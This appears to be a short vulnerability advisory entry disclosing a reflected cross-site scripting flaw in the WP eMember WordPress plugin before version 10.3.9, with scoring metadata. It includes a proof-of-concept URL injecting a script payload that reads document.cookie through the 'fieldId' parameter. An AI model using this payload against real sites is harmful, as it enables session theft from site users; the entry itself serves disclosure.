Lucene search

K
wpexploitKauenavarroWPEX-ID:6CC05A33-6592-4D35-8E66-9B6A9884DF7E
HistoryMay 14, 2024 - 12:00 a.m.

WP eMember < 10.3.9 - Reflected XSS

2024-05-1400:00:00
kauenavarro
43
wordpress
emember
xss
reflected
security
exploit
update

AI Score

9.3

Confidence

High

EPSS

0

Percentile

9.0%

Description The plugin does not sanitize and escape the “fieldId” parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.

https://www.example.com/wp-admin/admin-ajax.php?fieldId=<script>alert(document.cookie)</script>&action=check_name

AI Score

9.3

Confidence

High

EPSS

0

Percentile

9.0%

Related for WPEX-ID:6CC05A33-6592-4D35-8E66-9B6A9884DF7E